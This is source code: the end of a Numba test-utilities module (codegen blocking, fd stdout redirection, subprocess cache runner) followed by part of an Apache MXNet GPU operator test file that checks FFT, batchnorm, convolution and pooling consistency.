Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.targets import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
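# A hedged usage sketch: inside the block, anything that triggers LLVM code generation
# (e.g. the first call of a hypothetical jit-compiled function) raises RuntimeError
# instead of silently compiling.
#
#     with forbid_codegen():
#         cached_func(1)   # must already be compiled, or this raises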
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
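# A hedged, self-contained illustration (not used by the test suite): bytes written
# straight to the process-level stdout file descriptor are captured by
# redirect_c_stdout() instead of reaching the console.
def _demo_redirect_c_stdout():
    with redirect_c_stdout() as captured:
        os.write(sys.__stdout__.fileno(), b"hello from fd-level stdout\n")
    assert "hello from fd-level stdout" in captured.read()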
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
    The child process's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
class CheckWarningsMixin(object):
@contextlib.contextmanager
def check_warnings(self, messages, category=RuntimeWarning):
with warnings.catch_warnings(record=True) as catch:
warnings.simplefilter("always")
yield
found = 0
for w in catch:
for m in messages:
if m in str(w.message):
self.assertEqual(w.category, category)
found += 1
self.assertEqual(found, len(messages))
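# A hedged usage sketch of CheckWarningsMixin (hypothetical message text and category):
# assert that a block emits warnings whose text contains the given substrings.
#
#     with self.check_warnings(["deprecated"], category=DeprecationWarning):
#         ...  # code expected to warn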
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import test_create_csr, test_create_row_sparse, test_sparse_nd_slice
from test_sparse_ndarray import test_create_sparse_nd_empty, test_create_sparse_nd_from_sparse
from test_sparse_ndarray import test_create_sparse_nd_from_dense, test_create_sparse_nd_infer_shape
from test_sparse_ndarray import test_sparse_nd_check_format, test_sparse_nd_copy
from test_sparse_ndarray import test_sparse_nd_setitem, test_sparse_nd_binary_scalar_op
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm
del test_support_vector_machine_l2_svm
def check_countsketch(in_dim,out_dim,n):
sym = mx.sym.contrib.count_sketch(name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
# forward
exe_list = [sym.bind(mx.gpu(0), arr, arr_grad)]
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
assert_almost_equal(a,out1[0],rtol=1e-3, atol=1e-12)
# backward
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
for exe in exe_list:
exe.backward([out_grad])
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
assert_almost_equal(a,arr_grad[0].asnumpy(),rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_countsketch():
nrepeat = 2
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
for repeat in range(nrepeat):
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1,maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
#forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
@with_seed(0)
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
# V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list))
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
